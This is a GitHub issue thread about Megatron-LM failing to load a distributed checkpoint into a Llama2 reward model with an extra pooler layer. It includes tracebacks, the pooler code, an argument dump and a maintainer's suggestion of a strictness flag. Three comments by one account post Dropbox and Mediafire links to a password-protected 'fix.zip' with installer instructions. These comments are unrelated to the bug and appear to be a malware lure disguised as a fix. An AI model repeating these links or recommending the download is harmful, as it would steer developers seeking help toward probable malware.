### ISSUE TITLE
[BUG] When the model has extra layers, initializing the model from dist-ckpt results in an error

### ISSUE THREAD

**Issue by haolin-nju** [NVIDIA/Megatron-LM#1032]
**Describe the bug**
I'm trying to use the Llama2 model saved with `--use-dist-ckpt` after SFT (Supervised Fine-Tuning) to train a reward model. The reward model does not require the original checkpoint's `output_layer`, but instead needs an additional linearpooler layer. If I use `--use-dist-ckpt` to load the original SFT checkpoint, it throws the following error:

```shell
[rank0]: Traceback (most recent call last):
...[Deleted for privacy concerns]
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/training/training.py", line 234, in pretrain
[rank0]:     model, optimizer, opt_param_scheduler = setup_model_and_optimizer(
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/training/training.py", line 553, in setup_model_and_optimizer
[rank0]:     args.iteration, args.num_floating_point_operations_so_far = load_checkpoint(
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/training/checkpointing.py", line 790, in load_checkpoint
[rank0]:     state_dict, checkpoint_name, release = _load_base_checkpoint(load_dir, rank0=False, **load_kwargs)
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/training/checkpointing.py", line 601, in _load_base_checkpoint
[rank0]:     state_dict = dist_checkpointing.load(sharded_state_dict, checkpoint_name, load_strategy, strict=args.dist_ckpt_strictness)
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/serialization.py", line 160, in load
[rank0]:     loaded_state_dict = sharded_strategy.load(sharded_state_dict, checkpoint_dir)
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 726, in load
[rank0]:     checkpoint.load_state_dict(
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/state_dict_loader.py", line 36, in load_state_dict
[rank0]:     return _load_state_dict(
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/state_dict_loader.py", line 216, in _load_state_dict
[rank0]:     central_plan: LoadPlan = distW.reduce_scatter("plan", local_step, global_step)
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/utils.py", line 190, in reduce_scatter
[rank0]:     raise result
[rank0]: torch.distributed.checkpoint.api.CheckpointException: CheckpointException ranks:dict_keys([0, 1, 2, 3, 4, 5, 6, 7])
[rank0]: Traceback (most recent call last): (RANK 0)
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/utils.py", line 163, in reduce_scatter
[rank0]:     local_data = map_fun()
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/logger.py", line 64, in wrapper
[rank0]:     result = func(*args, **kwargs)
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/state_dict_loader.py", line 205, in local_step
[rank0]:     local_plan = planner.create_local_plan()
[rank0]:   File "/mnt/data/someoneMegatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 506, in create_local_plan
[rank0]:     self._validate_global_shapes(self.metadata, self.shapes_validation_sharded_tensors)
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 492, in _validate_global_shapes
[rank0]:     loaded_shape = metadata.state_dict_metadata[sh_ten.key].size
[rank0]: KeyError: 'pooler_head.dense1.weight'
...
[rank7]: Traceback (most recent call last): (RANK 6)
[rank7]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/utils.py", line 163, in reduce_scatter
[rank7]:     local_data = map_fun()
[rank7]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/logger.py", line 64, in wrapper
[rank7]:     result = func(*args, **kwargs)
[rank7]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/state_dict_loader.py", line 205, in local_step
[rank7]:     local_plan = planner.create_local_plan()
[rank7]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 506, in create_local_plan
[rank7]:     self._validate_global_shapes(self.metadata, self.shapes_validation_sharded_tensors)
[rank7]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 492, in _validate_global_shapes
[rank7]:     loaded_shape = metadata.state_dict_metadata[sh_ten.key].size
[rank7]: KeyError: 'pooler_head.dense1.weight'
[rank7]: Traceback (most recent call last): (RANK 7)
[rank7]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/utils.py", line 163, in reduce_scatter
[rank7]:     local_data = map_fun()
[rank7]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/logger.py", line 64, in wrapper
[rank7]:     result = func(*args, **kwargs)
[rank7]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/state_dict_loader.py", line 205, in local_step
[rank7]:     local_plan = planner.create_local_plan()
[rank7]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 506, in create_local_plan
[rank7]:     self._validate_global_shapes(self.metadata, self.shapes_validation_sharded_tensors)
[rank7]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 492, in _validate_global_shapes
[rank7]:     loaded_shape = metadata.state_dict_metadata[sh_ten.key].size
[rank7]: KeyError: 'pooler_head.dense1.weight'
```

It seems that the loader cannot find `sh_ten.key`, which is `pooler_head.dense1.weight`.

Disabling `--use-dist-ckpt` and self-define a `load_state_dict` function (to suppress the error) works for me. However, the error cannot be suppressed in the user-side when enabling `--use-dist-ckpt`. Such inconsistency might result in confusion.

**To Reproduce**
1. Train a Llama-2 7B SFT checkpoint (e.g., for 10 iterations) and save with `--use-dist-ckpt` in `Llama2-7b-tp8-pp1-sft-core080-dist-ckpt`
2. Define a Reward model 
    - Set Llama-2 7B as its backbone network. 
    - Add a LinearPooler layer as follows and forward the LinearPooler layer but not original `output_layer` in `forward` function
3. Load the checkpoint from `Llama2-7b-tp8-pp1-sft-core080-dist-ckpt`, train the Llama-2 7B Reward model, and you will reproduce the error.
```python
from megatron.core.transformer.module import MegatronModule
from megatron.core.transformer.utils import get_linear_layer

class LinearPooler(MegatronModule):
    def __init__(self, config, score_dimensions):
        super().__init__(config=config)
        args = get_args()
        hidden_size = config.hidden_size
        init_method = config.init_method
        self.dense1 = get_linear_layer(hidden_size, hidden_size, init_method, args.perform_initialization)
        self.dense2 = get_linear_layer(hidden_size, score_dimensions, init_method, args.perform_initialization)
        self.sequence_parallel = args.sequence_parallel

    def forward(self, hidden_states, sequence_indices=None):
        if self.sequence_parallel:
            hidden_states = tensor_parallel.gather_from_sequence_parallel_region(
                hidden_states,  # [s, b, h]
                tensor_parallel_output_grad=False)

        if sequence_indices is not None:
            selected_hidden = torch.index_select(hidden_states, 0, sequence_indices)
            selected_hidden = selected_hidden.diagonal(dim1=0, dim2=1).T
            pooled = self.dense2(torch.nn.functional.relu(self.dense1(selected_hidden)))
        else:
            selected_hidden = hidden_states  # [s, b, h]
            pooled = self.dense2(torch.nn.functional.relu(self.dense1(selected_hidden))).squeeze(2)  # [s, b, scoredim]

        return pooled
```
> Note: You could mock the data.

**Expected behavior**
Successfully load dist checkpoint

**Stack trace/logs**
```shell
------------------------ arguments ------------------------
  accumulate_allreduce_grads_in_fp32 .............. True
  adam_beta1 ...................................... 0.9
  adam_beta2 ...................................... 0.95
  adam_eps ........................................ 1e-08
  add_bias_linear ................................. False
  add_position_embedding .......................... False
  add_qkv_bias .................................... False
  adlr_autoresume ................................. False
  adlr_autoresume_interval ........................ 1000
  app_tag_run_name ................................ None
  app_tag_run_version ............................. 0.0.0
  apply_layernorm_1p .............................. False
  apply_query_key_layer_scaling ................... False
  apply_residual_connection_post_layernorm ........ False
  apply_rope_fusion ............................... True
  async_save ...................................... None
  async_tensor_model_parallel_allreduce ........... False
  attention_dropout ............................... 0.1
  attention_softmax_in_fp32 ....................... True
  auto_detect_ckpt_format ......................... True
  barrier_with_L1_time ............................ True
  bert_binary_head ................................ True
  bert_embedder_type .............................. megatron
  bert_load ....................................... None
  bf16 ............................................ True
  bias_dropout_fusion ............................. True
  bias_gelu_fusion ................................ False
  bias_swiglu_fusion .............................. True
  biencoder_projection_dim ........................ 0
  biencoder_shared_query_context_model ............ False
  block_data_path ................................. None
  calculate_per_token_loss ........................ False
  check_for_nan_in_loss_and_grad .................. True
  check_weight_hash_across_dp_replicas_interval ... None
  ckpt_assume_constant_structure .................. False
  ckpt_fully_parallel_load ........................ False
  ckpt_fully_parallel_save ........................ True
  ckpt_fully_parallel_save_deprecated ............. False
  ckpt_step ....................................... None
  classes_fraction ................................ 1.0
  clip_grad ....................................... 1.0
  clone_scatter_output_in_embedding ............... True
  consumed_train_samples .......................... 0
  consumed_valid_samples .......................... 0
  context_parallel_size ........................... 1
  create_attention_mask_in_dataloader ............. True
  cross_entropy_loss_fusion ....................... False
  data_cache_path ................................. None
  data_parallel_random_init ....................... False
  data_parallel_size .............................. 1
  data_path ....................................... ['/mnt/data/someone/data/reward/train.jsonl', '/mnt/data/someone/data/reward/dev.jsonl', '/mnt/data/someone/data/reward/dev.jsonl']
  data_per_class_fraction ......................... 1.0
  data_sharding ................................... True
  dataloader_type ................................. cyclic
  ddp_average_in_collective ....................... False
  ddp_bucket_size ................................. None
  decoder_num_layers .............................. None
  decoder_seq_length .............................. None
  decoupled_lr .................................... None
  decoupled_min_lr ................................ None
  defer_embedding_wgrad_compute ................... False
  delay_grad_reduce ............................... True
  delay_param_gather .............................. False
  deprecated_use_mcore_models ..................... False
  deterministic_mode .............................. False
  dino_bottleneck_size ............................ 256
  dino_freeze_last_layer .......................... 1
  dino_head_hidden_size ........................... 2048
  dino_local_crops_number ......................... 10
  dino_local_img_size ............................. 96
  dino_norm_last_layer ............................ False
  dino_teacher_temp ............................... 0.07
  dino_warmup_teacher_temp ........................ 0.04
  dino_warmup_teacher_temp_epochs ................. 30
  disable_straggler_on_startup .................... False
  dist_ckpt_format ................................ torch_dist
  dist_ckpt_strictness ............................ assume_ok_unexpected
  distribute_saved_activations .................... False
  distributed_backend ............................. nccl
  distributed_timeout_minutes ..................... 10
  embedding_path .................................. None
  empty_unused_memory_level ....................... 0
  enable_one_logger ............................... True
  encoder_num_layers .............................. 32
  encoder_seq_length .............................. 2048
  end_weight_decay ................................ 0.1
  eod_mask_loss ................................... False
  eval_interval ................................... 1000
  eval_iters ...................................... 20
  evidence_data_path .............................. None
  exit_duration_in_mins ........................... None
  exit_interval ................................... None
  exit_on_missing_checkpoint ...................... True
  exit_signal_handler ............................. False
  expert_model_parallel_size ...................... 1
  ffn_hidden_size ................................. 11008
  finetune ........................................ True
  fp16 ............................................ False
  fp16_lm_cross_entropy ........................... False
  fp32_residual_connection ........................ False
  fp8 ............................................. None
  fp8_amax_compute_algo ........................... most_recent
  fp8_amax_history_len ............................ 1
  fp8_interval .................................... 1
  fp8_margin ...................................... 0
  fp8_wgrad ....................................... True
  global_batch_size ............................... 64
  gradient_accumulation_fusion .................... True
  group_query_attention ........................... True
  head_lr_mult .................................... 1.0
  hidden_dropout .................................. 0.1
  hidden_size ..................................... 4096
  hybrid_attention_ratio .......................... 0.0
  hybrid_mlp_ratio ................................ 0.0
  hybrid_override_pattern ......................... None
  hysteresis ...................................... 2
  ict_head_size ................................... None
  ict_load ........................................ None
  img_h ........................................... 224
  img_w ........................................... 224
  indexer_batch_size .............................. 128
  indexer_log_interval ............................ 1000
  inference_batch_times_seqlen_threshold .......... 512
  init_method_std ................................. 0.006
  init_method_xavier_uniform ...................... False
  initial_loss_scale .............................. 4294967296
  iter_per_epoch .................................. 1250
  iteration ....................................... 10
  kv_channels ..................................... 128
  lazy_mpu_init ................................... None
  load ............................................ /mnt/data/someone/checkpoint/mcore/Llama2-7b-tp8-pp1-sft-core080-dist-ckpt
  local_rank ...................................... None
  log_batch_size_to_tensorboard ................... True
  log_interval .................................... 1
  log_learning_rate_to_tensorboard ................ True
  log_loss_scale_to_tensorboard ................... True
  log_memory_to_tensorboard ....................... False
  log_num_zeros_in_grad ........................... False
  log_params_norm ................................. False
  log_progress .................................... False
  log_straggler ................................... False
  log_throughput .................................. False
  log_timers_to_tensorboard ....................... True
  log_validation_ppl_to_tensorboard ............... True
  log_world_size_to_tensorboard ................... False
  logging_level ................................... None
  loss_scale ...................................... None
  loss_scale_window ............................... 1000
  lr .............................................. 1e-05
  lr_decay_iters .................................. 1000
  lr_decay_samples ................................ None
  lr_decay_style .................................. cosine
  lr_warmup_fraction .............................. None
  lr_warmup_init .................................. 0.0
  lr_warmup_iters ................................. 300
  lr_warmup_samples ............................... 0
  lr_wsd_decay_iters .............................. None
  lr_wsd_decay_samples ............................ None
  lr_wsd_decay_style .............................. exponential
  make_vocab_size_divisible_by .................... 128
  manual_gc ....................................... False
  manual_gc_eval .................................. True
  manual_gc_interval .............................. 0
  mask_factor ..................................... 1.0
  mask_prob ....................................... 0.15
  mask_type ....................................... random
  masked_softmax_fusion ........................... False
  max_position_embeddings ......................... 4096
  max_response .................................... 2
  max_tokens_to_oom ............................... 12000
  merge_file ...................................... None
  micro_batch_size ................................ 4
  min_loss_scale .................................. 1.0
  min_lr .......................................... 6e-12
  mmap_bin_files .................................. True
  mock_data ....................................... False
  moe_aux_loss_coeff .............................. 0.0
  moe_expert_capacity_factor ...................... None
  moe_extended_tp ................................. False
  moe_grouped_gemm ................................ False
  moe_input_jitter_eps ............................ None
  moe_layer_recompute ............................. False
  moe_pad_expert_input_to_capacity ................ False
  moe_per_layer_logging ........................... False
  moe_router_load_balancing_type .................. aux_loss
  moe_router_pre_softmax .......................... False
  moe_router_topk ................................. 2
  moe_token_dispatcher_type ....................... allgather
  moe_token_drop_policy ........................... probs
  moe_z_loss_coeff ................................ None
  nccl_communicator_config_path ................... None
  no_load_optim ................................... True
  no_load_rng ..................................... True
  no_persist_layer_norm ........................... False
  no_save_optim ................................... None
  no_save_rng ..................................... None
  norm_epsilon .................................... 1e-05
  normalization ................................... RMSNorm
  num_attention_heads ............................. 32
  num_channels .................................... 3
  num_classes ..................................... 1000
  num_dataset_builder_threads ..................... 1
  num_experts ..................................... None
  num_layers ...................................... 32
  num_layers_per_virtual_pipeline_stage ........... None
  num_query_groups ................................ 32
  num_workers ..................................... 8
  one_logger_async ................................ False
  one_logger_project .............................. megatron-lm
  one_logger_run_name ............................. None
  onnx_safe ....................................... None
  openai_gelu ..................................... False
  optimizer ....................................... adam
  output_bert_embeddings .......................... False
  overlap_grad_reduce ............................. False
  overlap_p2p_comm ................................ False
  overlap_param_gather ............................ False
  override_opt_param_scheduler .................... False
  padded_vocab_size ............................... 32000
  params_dtype .................................... torch.bfloat16
  patch_dim ....................................... 16
  perform_initialization .......................... True
  pipeline_model_parallel_size .................... 1
  pipeline_model_parallel_split_rank .............. None
  position_embedding_type ......................... rope
  pretrained_checkpoint ........................... None
  profile ......................................... False
  profile_ranks ................................... [0]
  profile_step_end ................................ 12
  profile_step_start .............................. 10
  qk_layernorm .................................... False
  query_in_block_prob ............................. 0.1
  rampup_batch_size ............................... None
  rank ............................................ 0
  recompute_granularity ........................... None
  recompute_method ................................ None
  recompute_num_layers ............................ None
  reset_attention_mask ............................ False
  reset_position_ids .............................. False
  retriever_report_topk_accuracies ................ []
  retriever_score_scaling ......................... False
  retriever_seq_length ............................ 256
  retro_add_retriever ............................. False
  retro_attention_gate ............................ 1
  retro_cyclic_train_iters ........................ None
  retro_encoder_attention_dropout ................. 0.1
  retro_encoder_hidden_dropout .................... 0.1
  retro_encoder_layers ............................ 2
  retro_num_neighbors ............................. 2
  retro_num_retrieved_chunks ...................... 2
  retro_project_dir ............................... None
  retro_verify_neighbor_count ..................... True
  rotary_base ..................................... 10000
  rotary_interleaved .............................. False
  rotary_percent .................................. 1.0
  rotary_seq_len_interpolation_factor ............. None
  s3_cache_path ................................... None
  sample_rate ..................................... 1.0
  save ............................................ /mnt/data/someone/checkpoint/mcore/Llama2-7b-tp8-pp1-reward-core080-dist-ckpt
  save_interval ................................... 1000
  scatter_gather_tensors_in_pipeline .............. True
  seed ............................................ 1234
  select_max_response ............................. firstk
  seq_length ...................................... 2048
  sequence_parallel ............................... True
  sgd_momentum .................................... 0.9
  short_seq_prob .................................. 0.1
  skip_train ...................................... False
  spec ............................................ None
  split ........................................... 98,2,0
  squared_relu .................................... False
  standalone_embedding_stage ...................... False
  start_weight_decay .............................. 0.1
  straggler_ctrlr_port ............................ 65535
  straggler_minmax_count .......................... 1
  swiglu .......................................... True
  swin_backbone_type .............................. tiny
  tensor_model_parallel_size ...................... 8
  tensorboard_dir ................................. /mnt/data/someone/checkpoint/mcore/Llama2-7b-tp8-pp1-reward-core080-dist-ckpt
  tensorboard_log_interval ........................ 100
  tensorboard_queue_size .......................... 1000
  test_data_path .................................. None
  test_mode ....................................... False
  tiktoken_num_special_tokens ..................... 1000
  tiktoken_pattern ................................ None
  tiktoken_special_tokens ......................... None
  timing_log_level ................................ 0
  timing_log_option ............................... minmax
  titles_data_path ................................ None
  tokenizer_model ................................. /mnt/data/someone/model/llama2_tokenizer.model
  tokenizer_type .................................. Llama2Tokenizer
  tp_comm_bulk_dgrad .............................. True
  tp_comm_bulk_wgrad .............................. True
  tp_comm_overlap ................................. False
  tp_comm_overlap_ag .............................. True
  tp_comm_overlap_cfg ............................. None
  tp_comm_overlap_rs .............................. True
  tp_comm_overlap_rs_dgrad ........................ False
  tp_comm_split_ag ................................ True
  tp_comm_split_rs ................................ True
  train_data_path ................................. None
  train_iters ..................................... 1000
  train_samples ................................... None
  transformer_impl ................................ transformer_engine
  transformer_pipeline_model_parallel_size ........ 1
  untie_embeddings_and_output_weights ............. True
  use_checkpoint_args ............................. True
  use_checkpoint_opt_param_scheduler .............. False
  use_cpu_initialization .......................... None
  use_dist_ckpt ................................... True
  use_distributed_optimizer ....................... False
  use_flash_attn .................................. True
  use_legacy_models ............................... False
  use_one_sent_docs ............................... False
  use_ring_exchange_p2p ........................... False
  use_rotary_position_embeddings .................. True
  use_tp_pp_dp_mapping ............................ False
  valid_data_path ................................. None
  variable_seq_lengths ............................ False
  virtual_pipeline_model_parallel_size ............ None
  vision_backbone_type ............................ vit
  vision_pretraining .............................. False
  vision_pretraining_type ......................... classify
  vocab_extra_ids ................................. 0
  vocab_file ...................................... None
  vocab_size ...................................... None
  wandb_exp_name .................................. 
  wandb_project ................................... 
  wandb_save_dir .................................. 
  weight_decay .................................... 0.1
  weight_decay_incr_style ......................... constant
  wgrad_deferral_limit ............................ 0
  world_size ...................................... 8
  yaml_cfg ........................................ None
-------------------- end of arguments ---------------------
```

**Environment (please complete the following information):**
 - Megatron-LM: core 0.8
 - NGC Container: 24.06

**Proposed fix**
Allow user-defined shard strategy, or fix `--dist-ckpt-strictness assume_ok_unexpected`

**Additional context**
I tried commenting out `self._validate_global_shapes(self.metadata, self.shapes_validation_sharded_tensors)`. Such solution didn't work because megatron threw another exception:
```shell
[rank0]: Traceback (most recent call last): (RANK 0)
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/utils.py", line 163, in reduce_scatter
[rank0]:     local_data = map_fun()
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/logger.py", line 64, in wrapper
[rank0]:     result = func(*args, **kwargs)
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/state_dict_loader.py", line 205, in local_step
[rank0]:     local_plan = planner.create_local_plan()
[rank0]:   File "/mnt/data/someone/Megatron-LM-benchmark/megatron/core/dist_checkpointing/strategies/torch.py", line 507, in create_local_plan
[rank0]:     return super().create_local_plan()
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/default_planner.py", line 188, in create_local_plan
[rank0]:     return create_default_local_load_plan(
[rank0]:   File "/usr/local/lib/python3.10/dist-packages/torch/distributed/checkpoint/default_planner.py", line 306, in create_default_local_load_plan
[rank0]:     raise RuntimeError(f"Missing key in checkpoint state_dict: {fqn}.")
[rank0]: RuntimeError: Missing key in checkpoint state_dict: pooler_head.dense1.weight.
```

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikolajblaz** [comment]
Have you tried setting `--dist-ckpt-strictness log_all`?
